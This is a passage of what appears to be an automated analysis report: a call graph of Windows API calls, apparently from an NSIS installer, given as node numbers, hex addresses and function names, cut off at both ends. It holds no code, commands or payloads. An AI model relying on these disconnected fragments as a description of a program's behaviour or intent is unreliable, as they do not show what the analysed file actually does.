3747 405dc1 ReadFile 3746->3747 3748 403149 3747->3748 3748->3725 3748->3726 3748->3728 3750 4067cc 3749->3750 3751 4067d4 3749->3751 3750->3736 3751->3750 3752 406864 GlobalAlloc 3751->3752 3753 40685b GlobalFree 3751->3753 3754 4068d2 GlobalFree 3751->3754 3755 4068db GlobalAlloc 3751->3755 3752->3750 3752->3751 3753->3752 3754->3755 3755->3750 3755->3751 3756->3721 4223 402570 4224 402c37 17 API calls 4223->4224 4225 402577 4224->4225 4228 405d3e GetFileAttributesW CreateFileW 4225->4228 4227 402583 4228->4227 4229 401b71 4230 401bc2 4229->4230 4231 401b7e 4229->4231 4232 401bc7 4230->4232 4233 401bec GlobalAlloc 4230->4233 4234 4022de 4231->4234 4239 401b95 4231->4239 4242 401c07 4232->4242 4250 40624c lstrcpynW 4232->4250 4235 40626e 17 API calls 4233->4235 4236 40626e 17 API calls 4234->4236 4235->4242 4238 4022eb 4236->4238 4244 4058ae MessageBoxIndirectW 4238->4244 4248 40624c lstrcpynW 4239->4248 4240 401bd9 GlobalFree 4240->4242 4243 401ba4 4249 40624c lstrcpynW 4243->4249 4244->4242 4246 401bb3 4251 40624c lstrcpynW 4246->4251 4248->4243 4249->4246 4250->4240 4251->4242 3757 4024f2 3758 402c77 17 API calls 3757->3758 3759 4024fc 3758->3759 3760 402c15 17 API calls 3759->3760 3761 402505 3760->3761 3762 402514 3761->3762 3767 402885 3761->3767 3763 402521 RegEnumKeyW 3762->3763 3764 40252d RegEnumValueW 3762->3764 3765 402549 RegCloseKey 3763->3765 3764->3765 3766 402542 3764->3766 3765->3767 3766->3765 4252 401a72 4253 402c15 17 API calls 4252->4253 4254 401a78 4253->4254 4255 402c15 17 API calls 4254->4255 4256 401a20 4255->4256 3769 401573 3770 401583 ShowWindow 3769->3770 3771 40158c 3769->3771 3770->3771 3772 40159a ShowWindow 3771->3772 3773 402abf 3771->3773 3772->3773 4257 4042f5 lstrcpynW lstrlenW 4258 4014f5 SetForegroundWindow 4259 402abf 4258->4259 4267 401e77 4268 402c37 17 API calls 4267->4268 4269 401e7d 4268->4269 4270 402c37 17 API calls 4269->4270 4271 401e86 4270->4271 4272 402c37 17 API calls 4271->4272 4273 401e8f 4272->4273 4274 402c37 17 API calls 4273->4274 4275 401e98 4274->4275 4276 401423 24 API calls 4275->4276 4277 401e9f 4276->4277 4284 405874 ShellExecuteExW 4277->4284 4279 401ee1 4280 402885 4279->4280 4281 4066d7 5 API calls 4279->4281 4282 401efb CloseHandle 4281->4282 4282->4280 4284->4279 3778 40167b 3779 402c37 17 API calls 3778->3779 3780 401682 3779->3780 3781 402c37 17 API calls 3780->3781 3782 40168b 3781->3782 3783 402c37 17 API calls 3782->3783 3784 401694 MoveFileW 3783->3784 3785 4016a0 3784->3785 3786 4016a7 3784->3786 3788 401423 24 API calls 3785->3788 3787 40658f 2 API calls 3786->3787 3790 40224a 3786->3790 3789 4016b6 3787->3789 3788->3790 3789->3790 3791 406012 36 API calls 3789->3791 3791->3785 4046 40247e 4047 402c77 17 API calls 4046->4047 4048 402488 4047->4048 4049 402c37 17 API calls 4048->4049 4050 402491 4049->4050 4051 40249c RegQueryValueExW 4050->4051 4055 402885 4050->4055 4052 4024c2 RegCloseKey 4051->4052 4053 4024bc 4051->4053 4052->4055 4053->4052 4057 406193 wsprintfW 4053->4057 4057->4052 4285 40437e 4286 404396 4285->4286 4293 4044b0 4285->4293 4290 4041e1 18 API calls 4286->4290 4287 40451a 4288 4045e4 4287->4288 4289 404524 GetDlgItem 4287->4289 4295 404248 8 API calls 4288->4295 4291 4045a5 4289->4291 4292 40453e 4289->4292 4294 4043fd 4290->4294 4291->4288 4299 4045b7 4291->4299 4292->4291 4298 404564 SendMessageW LoadCursorW SetCursor 4292->4298 4293->4287 4293->4288 4296 4044eb GetDlgItem SendMessageW 4293->4296 4297 4041e1 18 API calls 4294->4297 4310 4045df 4295->4310 4318 404203 KiUserCallbackDispatcher 4296->4318 4302 40440a CheckDlgButton 4297->4302 4322 40462d 4298->4322 4304 4045cd 4299->4304 4305 4045bd SendMessageW 4299->4305 4301 404515 4319 404609 4301->4319 4316 404203 KiUserCallbackDispatcher 4302->4316 4309 4045d3 SendMessageW 4304->4309 4304->4310 4305->4304 4309->4310 4311 404428 GetDlgItem 4317 404216 SendMessageW 4311->4317 4313 40443e SendMessageW 4314 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4313->4314 4315 40445b GetSysColor 4313->4315 4314->4310 4315->4314 4316->4311 4317->4313 4318->4301 4320 404617 4319->4320 4321 40461c SendMessageW 4319->4321 4320->4321 4321->4287 4325 405874 ShellExecuteExW 4322->4325 4324 404593 LoadCursorW SetCursor 4324->4291 4325->4324 4326 4020fe 4327 402c37 17 API calls 4326->4327 4328 402105 4327->4328 4329 402c37 17 API calls 4328->4329 4330 40210f 4329->4330 4331 402c37 17 API calls 4330->4331 4332 402119 4331->4332 4333 402c37 17 API calls 4332->4333 4334 402123 4333->4334 4335 402c37 17 API calls 4334->4335 4336 40212d 4335->4336 4337 40216c CoCreateInstance 4336->4337 4338 402c37 17 API calls 4336->4338 4341 40218b 4337->4341 4338->4337 4339 401423 24 API calls 4340 40224a 4339->4340 4341->4339 4341->4340 4342 4019ff 4343 402c37 17 API calls 4342->4343 4344 401a06 4343->4344 4345 402c37 17 API calls 4344->4345 4346 401a0f 4345->4346 4347 401a16 lstrcmpiW 4346->4347 4348 401a28 lstrcmpW 4346->4348 4349 401a1c 4347->4349 4348->4349 3160 403880 3161 403898 3160->3161 3162 40388a CloseHandle 3160->3162 3167 4038c5 3161->3167 3162->3161 3168 4038d3 3167->3168 3169 4038d8 FreeLibrary GlobalFree 3168->3169 3170 40389d 3168->3170 3169->3169 3169->3170 3171 40595a 3170->3171 3207 405c25 3171->3207 3174 405982 DeleteFileW 3179 4038a9 3174->3179 3175 405999 3177 405ab9 3175->3177 3221 40624c lstrcpynW 3175->3221 3177->3179 3250 40658f FindFirstFileW 3177->3250 3178 4059bf 3180 4059d2 3178->3180 3181 4059c5 lstrcatW 3178->3181 3222 405b69 lstrlenW 3180->3222 3182 4059d8 3181->3182 3185 4059e8 lstrcatW 3182->3185 3187 4059f3 lstrlenW FindFirstFileW 3182->3187 3185->3187 3187->3177 3205 405a15 3187->3205 3190 405a9c FindNextFileW 3194 405ab2 FindClose 3190->3194 3190->3205 3191 405912 5 API calls 3193 405af4 3191->3193 3195 405af8 3193->3195 3196 405b0e 3193->3196 3194->3177 3195->3179 3199 4052b0 24 API calls 3195->3199 3198 4052b0 24 API calls 3196->3198 3198->3179 3201 405b05 3199->3201 3200 40595a 60 API calls 3200->3205 3202 406012 36 API calls 3201->3202 3202->3179 3203 4052b0 24 API calls 3203->3190 3205->3190 3205->3200 3205->3203 3226 40624c lstrcpynW 3205->3226 3227 405912 3205->3227 3235 4052b0 3205->3235 3246 406012 MoveFileExW 3205->3246 3256 40624c lstrcpynW 3207->3256 3209 405c36 3257 405bc8 CharNextW CharNextW 3209->3257 3212 40597a 3212->3174 3212->3175 3214 405c7d lstrlenW 3215 405c88 3214->3215 3219 405c4c 3214->3219 3217 405b1d 3 API calls 3215->3217 3216 40658f 2 API calls 3216->3219 3218 405c8d GetFileAttributesW 3217->3218 3218->3212 3219->3212 3219->3214 3219->3216 3220 405b69 2 API calls 3219->3220 3220->3214 3221->3178 3223 405b77 3222->3223 3224 405b89 3223->3224 3225 405b7d CharPrevW 3223->3225 3224->3182 3225->3223 3225->3224 3226->3205 3276 405d19 GetFileAttributesW 3227->3276 3230 405935 DeleteFileW 3232 40593b 3230->3232 3231 40592d RemoveDirectoryW 3231->3232 3233 40593f 3232->3233 3234 40594b SetFileAttributesW 3232->3234 3233->3205 3234->3233 3236 4052cb 3235->3236 3245 40536d 3235->3245 3237 4052e7 lstrlenW 3236->3237 3279 40626e 3236->3279 3239 405310 3237->3239 3240 4052f5 lstrlenW 3237->3240 3242 405323 3239->3242 3243 405316 SetWindowTextW 3239->3243 3241 405307 lstrcatW 3240->3241 3240->3245 3241->3239 3244 405329 SendMessageW SendMessageW SendMessageW 3242->3244 3242->3245 3243->3242 3244->3245 3245->3205 3247 406033 3246->3247 3248 406026 3246->3248 3247->3205 3308 405e98 3248->3308 3251 405ade 3250->3251 3252 4065a5 FindClose 3250->3252 3251->3179 3253 405b1d lstrlenW CharPrevW 3251->3253 3252->3251 3254 405ae8 3253->3254 3255 405b39 lstrcatW 3253->3255 3254->3191 3255->3254 3256->3209 3258 405be5 3257->3258 3259 405bf7 3257->3259 3258->3259 3260 405bf2 CharNextW 3258->3260 3261 405c1b 3259->3261 3272 405b4a 3259->3272 3260->3261 3261->3212 3263 4064e0 3261->3263 3270 4064ed 3263->3270 3264 406563 3265 406568 CharPrevW 3264->3265 3267 406589 3264->3267 3265->3264 3266 406556 CharNextW 3266->3264 3266->3270 3267->3219 3268 405b4a CharNextW 3268->3270 3269 406542 CharNextW 3269->3270 3270->3264 3270->3266 3270->3268 3270->3269 3271 406551 CharNextW 3270->3271 3271->3266 3273 405b50 3272->3273 3274 405b66 3273->3274 3275 405b57 CharNextW 3273->3275 3274->3259 3275->3273 3277 40591e 3276->3277 3278 405d2b SetFileAttributesW 3276->3278 3277->3230 3277->3231 3277->3233 3278->3277 3283 40627b 3279->3283 3280 4064c6 3281 4064dc 3280->3281 3303 40624c lstrcpynW 3280->3303 3281->3237 3283->3280 3284 406494 lstrlenW 3283->3284 3285 40626e 10 API calls 3283->3285 3289 4063a9 GetSystemDirectoryW 3283->3289 3290 4063bc GetWindowsDirectoryW 3283->3290 3291 4064e0 5 API calls 3283->3291 3292 40626e 10 API calls 3283->3292 3293 406437 lstrcatW 3283->3293 3294 4063f0 SHGetSpecialFolderLocation 3283->3294 3296 40611a 3283->3296 3301 406193 wsprintfW 3283->3301 3302 40624c lstrcpynW 3283->3302 3284->3283 3285->3284 3289->3283 3290->3283 3291->3283 3292->3283 3293->3283 3294->3283 3295 406408 SHGetPathFromIDListW CoTaskMemFree 3294->3295 3295->3283 3304 4060b9 3296->3304 3299 40617e 3299->3283 3300 40614e RegQueryValueExW RegCloseKey 3300->3299 3301->3283 3302->3283 3303->3281 3305 4060c8 3304->3305 3306 4060d1 RegOpenKeyExW 3305->3306 3307 4060cc 3305->3307 3306->3307 3307->3299 3307->3300 3309 405ec8 3308->3309 3310 405eee GetShortPathNameW 3308->3310 3335 405d3e GetFileAttributesW CreateFileW 3309->3335 3312 405f03 3310->3312 3313 40600d 3310->3313 3312->3313 3315 405f0b wsprintfA 3312->3315 3313->3247 3314 405ed2 CloseHandle GetShortPathNameW 3314->3313 3316 405ee6 3314->3316 3317 40626e 17 API calls 3315->3317 3316->3310 3316->3313 3318 405f33 3317->3318 3336 405d3e GetFileAttributesW CreateFileW 3318->3336 3320 405f40 3320->3313 3321 405f4f GetFileSize GlobalAlloc 3320->3321 3322 405f71 3321->3322 3323 406006 CloseHandle 3321->3323 3337 405dc1 ReadFile 3322->3337 3323->3313 3328 405f90 lstrcpyA 3331 405fb2 3328->3331 3329 405fa4 3330 405ca3 4 API calls 3329->3330 3330->3331 3332 405fe9 SetFilePointer 3331->3332 3344 405df0 WriteFile 3332->3344 3335->3314 3336->3320 3338 405ddf 3337->3338 3338->3323 3339 405ca3 lstrlenA 3338->3339 3340 405ce4 lstrlenA 3339->3340 3341 405cec 3340->3341 3342 405cbd lstrcmpiA 3340->3342 3341->3328 3341->3329 3342->3341 3343 405cdb CharNextA 3342->3343 3343->3340 3345 405e0e GlobalFree 3344->3345 3345->3323 3346 401f00 3361 402c37 3346->3361 3349 4052b0 24 API calls 3350 401f10 3349->3350 3367 405831 CreateProcessW 3350->3367 3353 402885 3356 401f2b 3357 401f30 3356->3357 3358 401f3b 3356->3358 3375 406193 wsprintfW 3357->3375 3360 401f39 CloseHandle 3358->3360 3360->3353 3362 402c43 3361->3362 3363 40626e 17 API calls 3362->3363 3364 402c64 3363->3364 3365 401f06 3364->3365 3366 4064e0 5 API calls 3364->3366 3365->3349 3366->3365 3368 401f16 3367->3368 3369 405864 CloseHandle 3367->3369 3368->3353 3368->3360 3370 4066d7 WaitForSingleObject 3368->3370 3369->3368 3371 4066f1 3370->3371 3372 406703 GetExitCodeProcess 3371->3372 3376 406662 3371->3376 3372->3356 3375->3360 3377 40667f PeekMessageW 3376->3377 3378 406675 DispatchMessageW 3377->3378 3379 40668f WaitForSingleObject 3377->3379 3378->3377 3379->3371 4350 401000 4351 401037 BeginPaint GetClientRect 4350->4351 4352 40100c DefWindowProcW 4350->4352 4354 4010f3 4351->4354 4355 401179 4352->4355 4356 401073 CreateBrushIndirect FillRect DeleteObject 4354->4356 4357 4010fc 4354->4357 4356->4354 4358 401102 CreateFontIndirectW 4357->4358 4359 401167 EndPaint 4357->4359 4358->4359 4360 401112 6 API calls 4358->4360 4359->4355 4360->4359 4361 401503 4362 40150b 4361->4362 4364 40151e 4361->4364 4363 402c15 17 API calls 4362->4363 4363->4364 3444 402306 3445 40230e 3444->3445 3448 402314 3444->3448 3446 402c37 17 API calls 3445->3446 3446->3448 3447 402322 3450 402330 3447->3450 3451 402c37 17 API calls 3447->3451 3448->3447 3449 402c37 17 API calls 3448->3449 3449->3447 3452 402c37 17 API calls 3450->3452 3451->3450 3453 402339 WritePrivateProfileStringW 3452->3453 4365 404a06 4366 404a32 4365->4366 4367 404a16 4365->4367 4369 404a65 4366->4369 4370 404a38 SHGetPathFromIDListW 4366->4370 4376 405892 GetDlgItemTextW 4367->4376 4372 404a4f SendMessageW 4370->4372 4373 404a48 4370->4373 4371 404a23 SendMessageW 4371->4366 4372->4369 4374 40140b 2 API calls 4373->4374 4374->4372 4376->4371 4377 401f86 4378 402c37 17 API calls 4377->4378 4379 401f8d 4378->4379 4380 406626 5 API calls 4379->4380 4381 401f9c 4380->4381 4382 401fb8 GlobalAlloc 4381->4382 4383 402020 4381->4383 4382->4383 4384 401fcc 4382->4384 4385 406626 5 API calls 4384->4385 4386 401fd3 4385->4386 4387 406626 5 API calls 4386->4387 4388 401fdd 4387->4388 4388->4383 4392 406193 wsprintfW 4388->4392 4390 402012 4393 406193 wsprintfW 4390->4393 4392->4390 4393->4383 3461 403d08 3462 403d20 3461->3462 3463 403e5b 3461->3463 3462->3463 3465 403d2c 3462->3465 3464 403e6c GetDlgItem GetDlgItem 3463->3464 3469 403eac 3463->3469 3468 4041e1 18 API calls 3464->3468 3466 403d37 SetWindowPos 3465->3466 3467 403d4a 3465->3467 3466->3467 3471 403d67 3467->3471 3472 403d4f ShowWindow 3467->3472 3473 403e96 SetClassLongW 3468->3473 3470 403f06 3469->3470 3478 401389 2 API calls 3469->3478 3479 403e56 3470->3479 3532 40422d 3470->3532 3475 403d89 3471->3475 3476 403d6f DestroyWindow 3471->3476 3472->3471 3477 40140b 2 API calls 3473->3477 3481 403d8e SetWindowLongW 3475->3481 3482 403d9f 3475->3482 3480 40416a 3476->3480 3477->3469 3483 403ede 3478->3483 3480->3479 3489 40419b ShowWindow 3480->3489 3481->3479 3486 403e48 3482->3486 3487 403dab GetDlgItem 3482->3487 3483->3470 3488 403ee2 SendMessageW 3483->3488 3484 40140b 2 API calls 3501 403f18 3484->3501 3485 40416c DestroyWindow KiUserCallbackDispatcher 3485->3480 3554 404248 3486->3554 3490 403ddb 3487->3490 3491 403dbe SendMessageW IsWindowEnabled 3487->3491 3488->3479 3489->3479 3494 403de8 3490->3494 3495 403dfb 3490->3495 3496 403e2f SendMessageW 3490->3496 3505 403de0 3490->3505 3491->3479 3491->3490 3493 40626e 17 API calls 3493->3501 3494->3496 3494->3505 3498 403e03 3495->3498 3499 403e18 3495->3499 3496->3486 3548 40140b 3498->3548 3503 40140b 2 API calls 3499->3503 3500 403e16 3500->3486 3501->3479 3501->3484 3501->3485 3501->3493 3504 4041e1 18 API calls 3501->3504 3523 4040ac DestroyWindow 3501->3523 3535 4041e1 3501->3535 3506 403e1f 3503->3506 3504->3501 3551 4041ba 3505->3551 3506->3486 3506->3505 3508 403f93 GetDlgItem 3509 403fb0 ShowWindow KiUserCallbackDispatcher 3508->3509 3510 403fa8 3508->3510 3538 404203 KiUserCallbackDispatcher 3509->3538 3510->3509 3512 403fda EnableWindow 3517 403fee 3512->3517 3513 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3514 404023 SendMessageW 3513->3514 3513->3517 3514->3517 3517->3513 3539 404216 SendMessageW 3517->3539 3540 403ce9 3517->3540 3543 40624c lstrcpynW 3517->3543 3519 404052 lstrlenW 3520 40626e 17 API calls 3519->3520 3521 404068 SetWindowTextW 3520->3521 3544 401389 3521->3544 3523->3480 3524 4040c6 CreateDialogParamW 3523->3524 3524->3480 3525 4040f9 3524->3525 3526 4041e1 18 API calls 3525->3526 3527 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3526->3527 3528 401389 2 API calls 3527->3528 3529 40414a 3528->3529 3529->3479 3530 404152 ShowWindow 3529->3530 3531 40422d SendMessageW 3530->3531 3531->3480 3533 404245 3532->3533 3534 404236 SendMessageW 3532->3534 3533->3501 3534->3533 3536 40626e 17 API calls 3535->3536 3537 4041ec SetDlgItemTextW 3536->3537 3537->3508 3538->3512 3539->3517 3541 40626e 17 API calls 3540->3541 3542 403cf7 SetWindowTextW 3541->3542 3542->3517 3543->3519 3546 401390 3544->3546 3545 4013fe 3545->3501 3546->3545 3547 4013cb MulDiv SendMessageW 3546->3547 3547->3546 3549 401389 2 API calls 3548->3549 3550 401420 3549->3550 3550->3505 3552 4041c1 3551->3552 3553 4041c7 SendMessageW 3551->3553 3552->3553 3553->3500 3555 404260 GetWindowLongW 3554->3555 3565 4042e9 3554->3565 3556 404271 3555->3556 3555->3565 3557 404280 GetSysColor 3556->3557 3558 404283 3556->3558 3557->3558 3559 404293 SetBkMode 3558->3559 3560 404289 SetTextColor 3558->3560 3561 4042b1 3559->3561 3562 4042ab GetSysColor 3559->3562 3560->3559 3563 4042c2 3561->3563 3564 4042b8 SetBkColor 3561->3564 3562->3561 3563->3565 3566 4042d5 DeleteObject 3563->3566 3567 4042dc CreateBrushIndirect 3563->3567 3564->3563 3565->3479 3566->3567 3567->3565 3568 402388 3569 402390 3568->3569 3570 4023bb 3568->3570 3580 402c77 3569->3580 3572 402c37 17 API calls 3570->3572 3574 4023c2 3572->3574 3585 402cf5 3574->3585 3575 4023a1 3577 402c37 17 API calls 3575->3577 3579 4023a8 RegDeleteValueW RegCloseKey 3577->3579 3578 4023cf 3579->3578 3581 402c37 17 API calls 3580->3581 3582 402c8e 3581->3582 3583 4060b9 RegOpenKeyExW 3582->3583 3584 402397 3583->3584 3584->3575 3584->3578 3586 402d0b 3585->3586 3587 402d21 3586->3587 3589 402d2a 3586->3589 3587->3578 3590 4060b9 RegOpenKeyExW 3589->3590 3591 402d58 3590->3591 3592 402dd0 3591->3592 3593 402d5c 3591->3593 3592->3587 3594 402d7e RegEnumKeyW 3593->3594 3595 402d95 RegCloseKey 3593->3595 3596 402db6 RegCloseKey 3593->3596 3598 402d2a 6 API calls 3593->3598 3594->3593 3594->3595 3597 406626 5 API calls 3595->3597 3596->3592 3599 402da5 3597->3599 3598->3593 3600 402dc4 RegDeleteKeyW 3599->3600 3601 402da9 3599->3601 3600->3592 3601->3592 4401 40190c 4402 401943 4401->4402 4403 402c37 17 API calls 4402->4403 4404 401948 4403->4404 4405 40595a 67 API calls 4404->4405 4406 401951 4405->4406 4414 401d0e 4415 402c15 17 API calls 4414->4415 4416 401d15 4415->4416 4417 402c15 17 API calls 4416->4417 4418 401d21 GetDlgItem 4417->4418 4419 40258c 4418->4419 4420 40190f 4421 402c37 17 API calls 4420->4421 4422 401916 4421->4422 4423 4058ae MessageBoxIndirectW 4422->4423 4424 40191f 4423->4424 4425 401491 4426 4052b0 24 API calls 4425->4426 4427 401498 4426->4427 4428 402592 4429 4025c1 4428->4429 4430 4025a6 4428->4430 4431 4025f5 4429->4431 4432 4025c6 4429->4432 4433 402c15 17 API calls 4430->4433 4435 402c37 17 API calls 4431->4435 4434 402c37 17 API calls 4432->4434 4440 4025ad 4433->4440 4436 4025cd WideCharToMultiByte lstrlenA 4434->4436 4437 4025fc lstrlenW 4435->4437 4436->4440 4437->4440 4438 402629 4439 405df0 WriteFile 4438->4439 4441 40263f 4438->4441 4439->4441 4440->4438 4440->4441 4442 405e1f 5 API calls 4440->4442 4442->4438 4450 403918 4451 403923 4450->4451 4452 403927 4451->4452 4453 40392a GlobalAlloc 4451->4453 4453->4452 4454 401c19 4455 402c15 17 API calls 4454->4455 4456 401c20 4455->4456 4457 402c15 17 API calls 4456->4457 4458 401c2d 4457->4458 4459 402c37 17 API calls 4458->4459 4462 401c42 4458->4462 4459->4462 4460 401ca9 4465 402c37 17 API calls 4460->4465 4461 401c5d 4464 402c15 17 API calls 4461->4464 4463 402c37 17 API calls 4462->4463 4466 401c52 4462->4466 4463->4466 4467 401c62 4464->4467 4468 401cae 4465->4468 4466->4460 4466->4461 4469 402c15 17 API calls 4467->4469 4470 402c37 17 API calls 4468->4470 4471 401c6e 4469->4471 4472 401cb7 FindWindowExW 4470->4472 4473 401c99 SendMessageW 4471->4473 4474 401c7b SendMessageTimeoutW 4471->4474 4475 401cd9 4472->4475 4473->4475 4474->4475 4476 402a9a SendMessageW 4477 402ab4 InvalidateRect 4476->4477 4478 402abf 4476->4478 4477->4478 4479 40281b 4480 402821 4479->4480 4481 402829 FindClose 4480->4481 4482 402abf 4480->4482 4481->4482 4483 40149e 4484 4014ac PostQuitMessage 4483->4484 4485 4022f1 4483->4485 4484->4485 4486 4029a2 4487 402c15 17 API calls 4486->4487 4488 4029a8 4487->4488 4489 4029e8 4488->4489 4490 4029cf 4488->4490 4493 402885 4488->4493 4491 402a02 4489->4491 4492 4029f2 4489->4492 4494 4029d4 4490->4494 4495 4029e5 4490->4495 4497 40626e 17 API calls 4491->4497 4496 402c15 17 API calls 4492->4496 4500 40624c lstrcpynW 4494->4500 4495->4493 4501 406193 wsprintfW 4495->4501 4496->4495 4497->4495 4500->4493 4501->4493 3440 4015a3 3441 402c37 17 API calls 3440->3441 3442 4015aa SetFileAttributesW 3441->3442 3443 4015bc 3442->3443 4509 405224 4510 405234 4509->4510 4511 405248 4509->4511 4512 40523a 4510->4512 4521 405291 4510->4521 4513 405250 IsWindowVisible 4511->4513 4517 405267 4511->4517 4515 40422d SendMessageW 4512->4515 4516 40525d 4513->4516 4513->4521 4514 405296 CallWindowProcW 4518 405244 4514->4518 4515->4518 4522 404b7a SendMessageW 4516->4522 4517->4514 4527 404bfa 4517->4527 4521->4514 4523 404bd9 SendMessageW 4522->4523 4524 404b9d GetMessagePos ScreenToClient SendMessageW 4522->4524 4525 404bd1 4523->4525 4524->4525 4526 404bd6 4524->4526 4525->4517 4526->4523 4536 40624c lstrcpynW 4527->4536 4529 404c0d 4537 406193 wsprintfW 4529->4537 4531 404c17 4532 40140b 2 API calls 4531->4532 4533 404c20 4532->4533 4538 40624c lstrcpynW 4533->4538 4535 404c27 4535->4521 4536->4529 4537->4531 4538->4535 4539 4028a7 4540 402c37 17 API calls 4539->4540 4541 4028b5 4540->4541 4542 4028cb 4541->4542 4543 402c37 17 API calls 4541->4543 4544 405d19 2 API calls 4542->4544 4543->4542 4545 4028d1 4544->4545 4567 405d3e GetFileAttributesW CreateFileW 4545->4567 4547 4028de 4548 402981 4547->4548 4549 4028ea GlobalAlloc 4547->4549 4550 402989 DeleteFileW 4548->4550 4551 40299c 4548->4551 4552 402903 4549->4552 4553 402978 CloseHandle 4549->4553 4550->4551 4568 4032f5 SetFilePointer 4552->4568 4553->4548 4555 402909 4556 4032df ReadFile 4555->4556 4557 402912 GlobalAlloc 4556->4557 4558 402922 4557->4558 4559 402956 4557->4559 4560 4030fa 35 API calls 4558->4560 4561 405df0 WriteFile 4559->4561 4566 40292f 4560->4566 4562 402962 GlobalFree 4561->4562 4563 4030fa 35 API calls 4562->4563 4565 402975 4563->4565 4564 40294d GlobalFree 4564->4559 4565->4553 4566->4564 4567->4547 4568->4555 3602 40202c 3603 40203e 3602->3603 3613 4020f0 3602->3613 3604 402c37 17 API calls 3603->3604 3605 402045 3604->3605 3607 402c37 17 API calls 3605->3607 3606 401423 24 API calls 3611 40224a 3606->3611 3608 40204e 3607->3608 3609 402064 LoadLibraryExW 3608->3609 3610 402056 GetModuleHandleW 3608->3610 3612 402075 3609->3612 3609->3613 3610->3609 3610->3612 3622 406695 WideCharToMultiByte 3612->3622 3613->3606 3616 402086 3619 401423 24 API calls 3616->3619 3620 402096 3616->3620 3617 4020bf 3618 4052b0 24 API calls 3617->3618 3618->3620 3619->3620 3620->3611 3621 4020e2 FreeLibrary 3620->3621 3621->3611 3623 402080 3622->3623 3624 4066bf GetProcAddress 3622->3624 3623->3616 3623->3617 3624->3623 4569 404c2c GetDlgItem GetDlgItem 4570 404c7e 7 API calls 4569->4570 4578 404e97 4569->4578 4571 404d21 DeleteObject 4570->4571 4572 404d14 SendMessageW 4570->4572 4573 404d2a 4571->4573 4572->4571 4575 404d61 4573->4575 4577 40626e 17 API calls 4573->4577 4574 404f7b 4576 405027 4574->4576 4581 404e8a 4574->4581 4586 404fd4 SendMessageW 4574->4586 4579 4041e1 18 API calls 4575->4579 4582 405031 SendMessageW 4576->4582 4583 405039 4576->4583 4584 404d43 SendMessageW SendMessageW 4577->4584 4578->4574 4589 404b7a 5 API calls 4578->4589 4601 404f08 4578->4601 4580 404d75 4579->4580 4585 4041e1 18 API calls 4580->4585 4587 404248 8 API calls 4581->4587 4582->4583 4593 405052 4583->4593 4594 40504b ImageList_Destroy 4583->4594 4598 405062 4583->4598 4584->4573 4602 404d83 4585->4602 4586->4581 4591 404fe9 SendMessageW 4586->4591 4592 40521d 4587->4592 4588 404f6d SendMessageW 4588->4574 4589->4601 4590 4051d1 4590->4581 4599 4051e3 ShowWindow GetDlgItem ShowWindow 4590->4599 4597 404ffc 4591->4597 4595 40505b GlobalFree 4593->4595 4593->4598 4594->4593 4595->4598 4596 404e58 GetWindowLongW SetWindowLongW 4600 404e71 4596->4600 4607 40500d SendMessageW 4597->4607 4598->4590 4612 404bfa 4 API calls 4598->4612 4616 40509d 4598->4616 4599->4581 4603 404e77 ShowWindow 4600->4603 4604 404e8f 4600->4604 4601->4574 4601->4588 4602->4596 4606 404dd3 SendMessageW 4602->4606 4608 404e52 4602->4608 4610 404e20 SendMessageW 4602->4610 4611 404e0f SendMessageW 4602->4611 4620 404216 SendMessageW 4603->4620 4621 404216 SendMessageW 4604->4621 4606->4602 4607->4576 4608->4596 4608->4600 4610->4602 4611->4602 4612->4616 4613 4051a7 InvalidateRect 4613->4590 4614 4051bd 4613->4614 4622 404b35 4614->4622 4615 4050cb SendMessageW 4619 4050e1 4615->4619 4616->4615 4616->4619 4618 405155 SendMessageW SendMessageW 4618->4619 4619->4613 4619->4618 4620->4581 4621->4578 4625 404a6c 4622->4625 4624 404b4a 4624->4590 4626 404a85 4625->4626 4627 40626e 17 API calls 4626->4627 4628 404ae9 4627->4628 4629 40626e 17 API calls 4628->4629 4630 404af4 4629->4630 4631 40626e 17 API calls 4630->4631 4632 404b0a lstrlenW wsprintfW SetDlgItemTextW 4631->4632 4632->4624 4633 40432f lstrlenW 4634 404350 WideCharToMultiByte 4633->4634 4635 40434e 4633->4635 4635->4634 4636 402a2f 4637 402c15 17 API calls 4636->4637 4638 402a35 4637->4638 4639 402a6c 4638->4639 4640 402885 4638->4640 4642 402a47 4638->4642 4639->4640 4641 40626e 17 API calls 4639->4641 4641->4640 4642->4640 4644 406193 wsprintfW 4642->4644 4644->4640 4645 401a30 4646 402c37 17 API calls 4645->4646 4647 401a39 ExpandEnvironmentStringsW 4646->4647 4648 401a4d 4647->4648 4650 401a60 4647->4650 4649 401a52 lstrcmpW 4648->4649 4648->4650 4649->4650 4651 4046b0 4652 4046dc 4651->4652 4653 4046ed 4651->4653 4712 405892 GetDlgItemTextW 4652->4712 4655 4046f9 GetDlgItem 4653->4655 4661 404758 4653->4661 4657 40470d 4655->4657 4656 4046e7 4659 4064e0 5 API calls 4656->4659 4663 404721 SetWindowTextW 4657->4663 4668 405bc8 4 API calls 4657->4668 4658 40483c 4660 4049eb 4658->4660 4714 405892 GetDlgItemTextW 4658->4714 4659->4653 4667 404248 8 API calls 4660->4667 4661->4658 4661->4660 4664 40626e 17 API calls 4661->4664 4666 4041e1 18 API calls 4663->4666 4669 4047cc SHBrowseForFolderW 4664->4669 4665 40486c 4670 405c25 18 API calls 4665->4670 4671 40473d 4666->4671 4672 4049ff 4667->4672 4673 404717 4668->4673 4669->4658 4674 4047e4 CoTaskMemFree 4669->4674 4675 404872 4670->4675 4676 4041e1 18 API calls 4671->4676 4673->4663 4677 405b1d 3 API calls 4673->4677 4678 405b1d 3 API calls 4674->4678 4715 40624c lstrcpynW 4675->4715 4679 40474b 4676->4679 4677->4663 4680 4047f1 4678->4680 4713 404216 SendMessageW 4679->4713 4683 404828 SetDlgItemTextW 4680->4683 4688 40626e 17 API calls 4680->4688 4683->4658 4684 404751 4686 406626 5 API calls 4684->4686 4685 404889 4687 406626 5 API calls 4685->4687 4686->4661 4695 404890 4687->4695 4689 404810 lstrcmpiW 4688->4689 4689->4683 4692 404821 lstrcatW 4689->4692 4690 4048d1 4716 40624c lstrcpynW 4690->4716 4692->4683 4693 4048d8 4694 405bc8 4 API calls 4693->4694 4696 4048de GetDiskFreeSpaceW 4694->4696 4695->4690 4698 405b69 2 API calls 4695->4698 4700 404929 4695->4700 4699 404902 MulDiv 4696->4699 4696->4700 4698->4695 4699->4700 4701 40499a 4700->4701 4702 404b35 20 API calls 4700->4702 4703 4049bd 4701->4703 4705 40140b 2 API calls 